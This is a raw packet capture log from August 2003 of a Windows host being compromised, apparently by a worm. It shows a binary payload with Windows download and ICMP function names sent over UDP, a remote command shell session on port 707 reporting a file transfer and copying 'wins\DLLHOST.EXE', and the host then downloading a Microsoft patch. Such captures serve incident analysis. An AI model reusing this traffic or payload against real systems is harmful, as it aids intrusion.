=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.621266 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:152 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.622836 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40884 IpLen:20 DgmLen:544 Len: 516 ....t.-x..........f.....T.\.t.h4.t#.t.........j...&c.-CX.u.&Fl.6 ...|..u.g|.XC.[.W.p.u.....~.od...(W...................".^..j..NH .p5 ...0....EPh....2...&Togu......p....6.{(....t.V..`.......Qs.. ......F..w.IQl.xF..hA......p..l...x`..o..t(..g......V..0...P'b.. .u.....,.k...........Vo.V(..D1R.il.`6W.v$._.dA.u.<e.j. .R]d..V., -l.Lsl.w..+..X.>..`.=..a'..Gh.....~0..,cw(>.YQ.py!+D......-;Y... .......i..0....=.....%.v........b.Q..L.l..=......b+..oq~...0g..6 h.b.......Jc`oV..b.O........F.aC...t.B..>.A.....]........Rt..... $c.[ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.624380 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:153 IpLen:20 DgmLen:32 Len: 4 .... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.625570 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40885 IpLen:20 DgmLen:544 Len: 516 ......H....r...<; c..u.@(v..#..tf...N}/..YtMBP..<i./6.h.{.4.1..T 5...*%.}.h..`i..3..V`...yz.].P...k.C+..y....0./`...B....t.V..... PmXtg.Q57...[X.PO2.O......H...W;..&.lo......\L............[...O1 ...t.....'..P@'.......G..;..=-u.A.z......\..$o...;...0R.z....... ..$....9.......H...~. ......<..0F...mi.>..1^.P...+).$f&..-.F.!.K U68cmF%5;T5pM..R?.N.;.Rs.,2.<...y.>.......J.Iu..Z3....-...{.~Y.O .."..rvK...,.ipt.]...<f..+8.O.v[':..u._+.^.t..f-.P.b...._.P.f..; .W...a.m5.C..n..9........pt.......O(I.p.L..I.Ft..IV..o...WK...|T ...6 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.626025 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:154 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.626948 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40886 IpLen:20 DgmLen:544 Len: 516 ......3..W.f....'..v.....gl.......fl......H(X...+.$.SiL......,.. .g]..%.W|:...j.....Z..Y....j.....a..=$ex..o...j......#5(....6... @5....+.?>.o.1+_.2....=..... ...z....D>(,..i..4(..Qh..PDtE.x...H ..W..!.64s......(.'....(...p6au.H....*.w.3.uisvV...Q.$....r..... .....p....A,0.5.w...,.lt....@zX..W`^.....*..cBL-{.0.h.b.....2h.. ..V.K_....Ph.......,...........w...H..........W..c...p.."$.X@H.{ .S....d..;.......L$(...w.q6..U.]...0.....4@.<......$0.QU...=.L.. 78O...3@h..c@.t......$...R.....V.W...........W.l.6...U.v(..=.S.. 2..d =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.628472 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:155 IpLen:20 DgmLen:32 Len: 4 .... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.629503 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40888 IpLen:20 DgmLen:544 Len: 516 .....=.......BsB_4U]..U..l.e]-4..=.AK<.E.0.,..M.L..F..8.U..-[. . JSV.".`...@Mm........)...."..~[l.B..>.a.....-.. QFS....N 2.{.u&. .+....j.+$6B.,jR]...C.B...|..........nw.......d..........Hs..... ..'...{v....[.k..o.Vt-..8;.v....).......\x..<+.;.w.{t.....K<|0$. 3............S..I..!..Z[xK.L_..J*...p...J...0..F......8..b..!".! .~...PV..ou.bn3.,/&3.&......._.ph.<4...z....`=..kG.t.Q.s_G....k. ..u..tw..Q.. )..X%8.>bH..n0.[.qF(..~...B..$.J......cR.......u... ......Lw..........u)w..$...hL.\q..........T.-j...t..=.....C..... .=.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.629950 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:156 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.630888 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40889 IpLen:20 DgmLen:544 Len: 516 ......[NQM...M.(.......3.h...p.H.~#..t4^.a.6..|j....n=0..).....S .z..r......L.A..Q.t.~_6..$....PR.x...D.8...y..~QP.E.:..........5 ..u....R.f.....]..:.d....o[.....8|/...B.....pN....p...#.4.A=...k .,...5..k.;......s..L.1,.S.d+Q.)....!....X....j\.hf!......:S.$0Q ..V.'..m.-.F..f....zf.....Cl=..=`.V.>.....|,wu............u.3... ......h..(........!."B.l.....1..yW...6.j..T.q.....h6Hh4Tj%K`.]ZA .Q&.H..(h.t.8..A$.dKLb.GpJ.......Q,.[X....t.U..:D*3dF...ga/_..!. ..\..$..0 .<..N.jP....<.."...pK..9...QU.n .i.C..f.G.$.hd\@...... H..9 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.632486 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:157 IpLen:20 DgmLen:32 Len: 4 .... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.633609 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40890 IpLen:20 DgmLen:544 Len: 516 ....#Yqy.[@.d..>.QlXC..j...>.HXqh...f.A.d.&...n.1......R8..9.lV. +.-.X7.V.,c.9.....(z...O.['..........L .#.&{...DR^.P.n.A.Q?L=h.t .C..R.H...jcP.X...9.{....Q.......tY..t.X..Bo.R.)A...[.....8...L. ....P.Xg....5.j...h)B....VR...O 1..48.P.5.0z.W...k..x...0.7..Q.p 3.;.....*.. ~<u.....y..+WPQ.ht)....Y..2d}..Ukno..3+.........)".@ H..fs..%.H.8[\>u!.h...1d....O.Pd.%.. S......ese..('Y...lg3.....$ d[...v.....wd........_\ha. ..=.@.'.0...H.O..YPF.g.!P(...@E.vs... .....P..g....PP..2....C\mM..u..6..e..D..I.W...4..E......M.P60lm. .Y.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.634124 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:158 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.635045 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40891 IpLen:20 DgmLen:544 Len: 516 .....+....}G..@..`.5dv..&)!.).5...q#,A0..d.;...X@.PTafdd.......Q ..9"..g.0D...y^>..%u5390.665ead993k..n756..f8..#.#..f4e40....?23 .12cM09...N.ad48/088..d..9a.a85..~.2_aa.d8.d6_..v.b.wcq9....|fil omid.fafdfgfhinhnl. ..aljbea.limpdk+....ji.ipefp.+n.....p.gekbai jeh...vk..dn.mh1+..kn.w?yiasj..=...%B.de.67.bmg...g......i.]eo.h Ab.m.k6.sk.e......j.j.icggkng5.v.5..ok.ogW...6..fO.p.'md.a...ech m....Z..yeddccbb..#o...f;.hh.-....S.w595168.]p.7...18......<?xml version="1.0...."?>..<g:s.rchrequest %....ns:g!DAV:"ql.Se..k.Dc .Ps =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.636572 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:159 IpLen:20 DgmLen:32 Len: 4 .... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.637621 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40892 IpLen:20 DgmLen:544 Len: 516 ....p...X.y.me" fr8 scodo...()//0.\......0=.=.=.=.=.=.=.=.=.=.=. ....=.=..`.d.g.h.f.q...].b.......*.5.....H.D.W.T.\.`.b.S._...... .......m...........G...j.........?.X.Y.E.....K.U.h.........m.k.. u.......l...q.p...4.._.L4.f..^d.]|..k*......H..^......W.......9. ...F.]..........+...\.H`7G....u....?...K.&...2$X..EdI.p..t,..`^. .p.4...G|.......*.{..M...j. .nr..MARB3...9.........`o..EOW.].!k. .8..0~....(....3..r...C..L..._...(..d)...H.l.s...dH.d...t_H..s`. X.5M..@ x...}3`.PO.. ......._H.6...f.....+...x.x....p....O...&.. .=.W =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.638073 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:160 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.639047 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40894 IpLen:20 DgmLen:544 Len: 516 .....W2.1....N...C....%....;..c.........J...6....Poz....0O..._n# ... /....d...F.?.......Gh.x.h..h..w_...[.\.C.$.A...1-3.4.5.6.... ..sd.o.c.N.B.....R..2.............ZJ3.f.v......4.........pa..!.. ../.......4....A....j...........b....t......k...j?.....^..{....p ...T....ZHx.X.P.......Z{Xx..S..c.n._..I....7..q.n..`f.e.h......u ..m......{b.........m"m!.......^..............Y!....^..........~ .q^..I.^....L......na.e.u25.Y.`.x.....K..2{wZq.f..........{o.... ........................c.............y........c..).........$..o .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.640571 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:161 IpLen:20 DgmLen:32 Len: 4 .... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.641563 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40895 IpLen:20 DgmLen:544 Len: 516 .....:..W ?.. -..*....&..(...../.7.M.y dllca.e\t}...ft4.exe w(s\ sv..+..o.........DLLHOST.EXE......IT8S.Patch.V..ArZI..../.==.... ......./...bc4wGETRh.-. HTTP/.1`A.FoT..t: .)......,.x-mq..xbitp. j.g..g..p.*/*AU.o[..r-A.nEM.ioa/4.T.B. (.5..m.F..;.SIE 5.5..Q..W .:ws 98....\H.5..Cg....n0n.Ke...j.S{..5..g... I z[.... my.f.& "b ..Bm{:)~. _vxn....CXan.NoTcehs.] 2.42. B.6[`mA.lf8.....orrCzh}gv 6oh.".H.t-..^v://.n..m..V.V.8..q.Q.../6/9/5.Z7d7./..Y-fb7a-4.9-b 1e6-...*?zb62fl2....'..0-KB823...o..x8%KOR.s/...o8/f.8.716.r..1- 8db3 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.642013 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:162 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.645036 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40896 IpLen:20 DgmLen:544 Len: 516 ....sf4570a56b.+...9d8.sCHT..f"21.81c0df>..Z.772bs.L912...M=TbSe 9.s.<.vS.0/101fddmk/.40f-efc533d..2..mk.4\.e4.5s....ENU.3m+twue3 1\2..5G..Wh|.s[3e81eb45.!..54fXP..9.B[3GA6rCk..3dH[507.]..ac2i32 .3...F.8s.s...]a.5.+d0C..Gy3a38DM4.5e....Yde..s....S9Cb.Zk.F)cf. dl.5u@..8sm-95#.p+%.3f.s..-...q -i %s <...get nSVC..../).b.. .. $.-..w&k .8Shar....+g.l..DTCo$.L.B..j.V..+WINSX..5.zF.wAX..nr.`K .,....-n.ozqm]../S*v.P_kn...Xsyx.,>cZ`{.T.eou.o.u..1..ecTraUf5.n .,-u.s.ul.F00.6.Da...... ....%.7...M `p.j....l.7...G....t.-Typ.. xt/m =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.646583 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:163 IpLen:20 DgmLen:32 Len: 4 .... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.647510 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40897 IpLen:20 DgmLen:544 Len: 516 ....o..N.l.gth.3.o?hA.YX..SEAR...^....}.....KP.......m.O.W"E\.\U .....aO:y.a..A.P2\E.3.E..1y...t55On.`l&@.nKcf....ig.aN .uEn6..Q D.+mIP 0....dr...%.X..p-d.+_Mu..1.H{mszap.`.....11....C.4n'k..D. ..-I....IS.... B......X....BR...2....GetL.`..DError.I..J..rlocke dDecRa....#.balAl..@.n.F.e.Op.P8_...dIF.Attro%..ibut.AS'....Modu .Hand..Un.....ViewOf-.C]....v.A.^.6.InL...,....]V..3.g.ExxC$=... X.OEMCP.S{..NW.fa..CID..}...Nam.TRmin.....EWai.>S.....%ObjH6{... 95x....<Tim.i.......,u..Th.d^[..<.p../;\.>so..ir.MvsftyA6o!help3 .`.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.647968 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:164 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.648955 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40899 IpLen:20 DgmLen:544 Len: 516 ....2S.pshoPg.+.X....NYo6...=s.E....KU.....mR....%h.ge}.g..C.2.. l.,Qu.y.Start{7K.Q.pRegi.q.1.r6#l.r....9.DtusL.P..+D..e!.=..0... .vA.AAdjust1Y@.bws.F...SC.rhl.aY.?......3!..Key.\.=..3.=..#.y..u p..acV2u|.PIci...mp...8F..7.|.E...,.7...er.h..._Xcp.r.__.nG...rg ._..-..".m..r......rd.??2@YAPAXI@Z6p....X,ev..k.>Cs7..WaJ6.`._fd ..9m6Z..D....f....b..f...-6K>p.typ.w....._h.3.w...Y9.fp..\....3X ...,.\mGm........1URLD..t.Qj...H........$eY.MP....9..eY.4.....Y. eY.t......es..qPE....L.... .......fA..R@../.d..........[.t...1.. .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.650551 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:165 IpLen:20 DgmLen:32 Len: 4 .... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.651562 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40900 IpLen:20 DgmLen:544 Len: 516 ......6..!..A...)...&...l...:!.0.-....`.r.a).0.S...j....@.&<.&P. ....'....C.^u.......................`..p@.......W.............F. .G..u........r........u............s.u........s.1....r......F... tt....u............u..........u A..u............s.u........s.... .........../...v...B..GIu..c.................w....L...^...]..... G,.<.w..?.u...._.f........)..................p......tE._...0.... ..P............G..t...y....GPG.WH..U........t..............a.... ................................................................ .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.652005 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:166 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.653051 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40901 IpLen:20 DgmLen:544 Len: 516 ................................................................ ................................................................ ........$...............................<...L.......Z.......h... ....v.......|.......................KERNEL32.DLL.ADVAPI32.dll.IC MP.dll.MSVCRT.dll.urlmon.dll.USER32.dll.WS2_32.dll..LoadLibraryA ..GetProcAddress..ExitProcess...RegCloseKey...IcmpSendEcho..exit ..URLDownloadToFileA..ExitWindowsEx............................. ................................................................ .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.654592 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:167 IpLen:20 DgmLen:32 Len: 4 .... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.655132 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40902 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.655414 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:168 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.818102 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40919 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x6725DD25 Ack: 0x7339CD74 Win: 0xFD70 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.818479 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:169 IpLen:20 DgmLen:124 DF ***AP*** Seq: 0x7339CD74 Ack: 0x6725DD25 Win: 0xFA50 TcpLen: 20 Transfer successful: 10240 bytes in 1 second, 10240 bytes/s..... C:\WINDOWS\system32> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:11.319971 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40938 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0x6725DD25 Ack: 0x7339CDC8 Win: 0xFD1C TcpLen: 20 wins\DLLHOST.EXE.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:11.320504 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:170 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0x7339CDC8 Ack: 0x6725DD37 Win: 0xFA3E TcpLen: 20 .wins\DLLHOST.EXE. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:11.518707 137.189.153.17:707 -> 192.168.20.2:1031
TCP TTL:125 TOS:0x0 ID:40943 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x6725DD37 Ack: 0x7339CDDA Win: 0xFD0A TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:12.319966 137.189.153.17:707 -> 192.168.20.2:1031
TCP TTL:125 TOS:0x0 ID:41005 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x6725DD37 Ack: 0x7339CDDA Win: 0x0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:12.720274 192.168.20.2:1034 -> 137.189.96.50:53
UDP TTL:128 TOS:0x0 ID:171 IpLen:20 DgmLen:59
Len: 31
.............microsoft.com.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:12.931773 137.189.96.50:53 -> 192.168.20.2:1034
UDP TTL:253 TOS:0x0 ID:34515 IpLen:20 DgmLen:289 DF
Len: 261
.............microsoft.com......................................
.......-7...dns1.dc.msft.net.........-7...dns1.sj.S........-7...
dns1.tk.S........-7...dns3.uk.S........-7...dns1.cp.S.........9.
......K.......9..@....i.......9..A6...........9...............9.
.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:13.218010 192.168.20.2:1034 -> 137.189.96.50:53
UDP TTL:128 TOS:0x0 ID:172 IpLen:20 DgmLen:68
Len: 40
.............download.microsoft.com.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:13.682166 137.189.96.50:53 -> 192.168.20.2:1034
UDP TTL:253 TOS:0x0 ID:34516 IpLen:20 DgmLen:401 DF
Len: 373
.............download.microsoft.com................ .dl.ms.geore
director.akadns.net..4...........download.microsoft.com.d4p.O.`.
..........a767.ms.akamai.O......................................
.......................n4ms...............n5ms...............n6m
s...............n7ms...............n8ms...............n0ms......
.........n1ms...............n2ms...............n3ms..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:13.695115 192.168.20.2:1036 -> 202.181.234.24:80
TCP TTL:128 TOS:0x0 ID:173 IpLen:20 DgmLen:48 DF
******S* Seq: 0x734A91C2 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:13.696712 202.181.234.24:80 -> 192.168.20.2:1036
TCP TTL:61 TOS:0x0 ID:2393 IpLen:20 DgmLen:48 DF
***A**S* Seq: 0x6BE55150 Ack: 0x734A91C3 Win: 0x2238 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:13.697038 192.168.20.2:1036 -> 202.181.234.24:80
TCP TTL:128 TOS:0x0 ID:175 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x734A91C3 Ack: 0x6BE55151 Win: 0xFAF0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:13.697552 192.168.20.2:1036 -> 202.181.234.24:80
TCP TTL:128 TOS:0x0 ID:176 IpLen:20 DgmLen:271 DF
***AP*** Seq: 0x734A91C3 Ack: 0x6BE55151 Win: 0xFAF0 TcpLen: 20
GET /download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/Windows
XP-KB823980-x86-ENU.exe HTTP/1.0..Accept: */*..User-Agent: Mozil
la/4.0 (compatible; MSIE 6.0; Windows NT 5.1)..Host: download.mi
crosoft.com..Connection: Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.698557 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:2649 IpLen:20 DgmLen:40 ***A**** Seq: 0x6BE55151 Ack: 0x734A92AA Win: 0x3F19 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.843183 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:2905 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BE55151 Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 HTTP/1.0 200 OK..Age: 11732..Accept-Ranges: bytes..Date: Tue, 19 Aug 2003 04:01:40 GMT..Content-Length: 1291040..Content-Type: a pplication/x-msdownload..Connection: keep-alive..Server: Microso ft-IIS/5.0..Last-Modified: Sat, 05 Jul 2003 20:18:54 GMT..ETag: "202749a83243c31:8e0"..Via: 1.1 csc0g02prb (NetCache NetApp/5.3. 1R4D1)....MZ......................@............................. ..................!..L.!This program cannot be run in DOS mode.. ..$.......+.Dlo.*?o.*?o.*?o.+?=.*?..3?`.*?..o?n.*?..6?..*?...?n. *?Richo.*?........PE..L....'.>.................V...........A... ........... .................................................... ...................m..........H............... ...........p!.... ........................................... ..d................. ...........text....U... ...V.................. ..`.data...(..... .......Z..............@....rsrc...H........<...\..............@. .@.............................................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ...........p...p...p...p..zp..bp...o...o...o...p..:p..Pp........ 
......Dt..Tt...r...p...p...q...q.."q..4q..Lq..`q..pq =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.843295 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:3161 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BE55705 Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 ..~q...q...q...q...q...q...q...r...r.."r..0r..<r..Jr..br..pr...r ..4t...r...r...r...r...r...s...s..,s..Bs..Vs..ns..~s...s...s...s ...s...s...s...t.."t..ft.......u...u.......t...t...t...t...t...t ...t...u.......o...o...o...o...o......\u..Fu..,u.."u............ ...........'.>.............#..................Z.......$shtdwn$.r eq...._SFX_CAB_SHUTDOWN_REQUEST...InitiateSystemShutdownExA...ad vapi32.dll....WFP_IDLE_TRIGGER....DecryptFileA....temp\ext....%0 2x....%s..backofficestorage...cdtag.1._SFX_CAB_EXE_PATH...\updat e\update.exe.................................................... ......................................................>...^...~. ..........~......................................../...?..._.... ................................................................ ......................................................NB10.....' .>....sfxcab.pdb..U..Q........t.SV3.SSSP..L ..S.E.P.....Vh@....5 ......H ....tH9u.uC.=@...Sdwnu7..K....u5..K...@.=D.........O...u ...H......?u..%K........K....^[..SV.t$...W.H...@..u..|$.+....... .8..........z.\t...\B.D$..p...@..u.+..t$..H................._^.. [....t$.j..5......P ...V.t$.V..T 